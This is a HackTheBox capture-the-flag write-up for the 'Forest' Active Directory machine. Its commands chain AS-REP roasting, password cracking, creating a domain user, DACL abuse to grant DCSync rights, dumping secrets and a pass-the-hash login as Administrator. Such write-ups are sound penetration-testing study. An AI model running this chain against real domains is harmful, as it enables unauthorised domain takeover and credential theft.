Where Notes Work
Forest Writeup | HackTheBox
nmap scan:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-06-26 17:44:12Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
425/tcp filtered icad-el no-response
445/tcp open syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Domain: htb.local
Host: FOREST
Enumerating users with enum4linux and ldapsearch
enum4linux -a -u '' -p '' 10.10.10.161
using ldapsearch to enumerate users and groups
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local" "objectclass=user" samaccountName | grep sAMAccountName
after getting the users, save the users in a file, after that, i used getNPUsers tool of impacket to get the Kerberos hashes.
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users -no-pass
after getting the hash cracked it using john with krb5asrep format.
john --format=krb5asrep alfreso.hashes --wordlist=rockyou.txt
after that connect using evil-winrm, checking for user group found that user is in Service Accounts group, after that runs SharpHound.exe and upload the output to bloodhound.
Checking for shortest path to Domain admins found that Exchange Windows Permissions group “Write Dacl” to Domain Admins.
As, I am in Service account group, i have ability to create new user and add it to groups but not high privilege groups. I added a new user and added it to “Exchange Windows Permissions”, and after the used provided Bloodhound command for Write Dacl misconfiguration to abuse DACL.
#adding new user to domain
C:> net user fuser hacker123 /add /domain
#adding user to Exchange Windows Permissions group
C:> net group "Exchange Windows Permissions" fuser /add /domain
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\\fuser', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -Principal fuser -Rights DCSync
after that used secretsdump to dump the hashes.
$ impacket-secretsdump htb.local/fuser:[email protected]
after getting the hash, login as Administrator using hash
$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
rooted.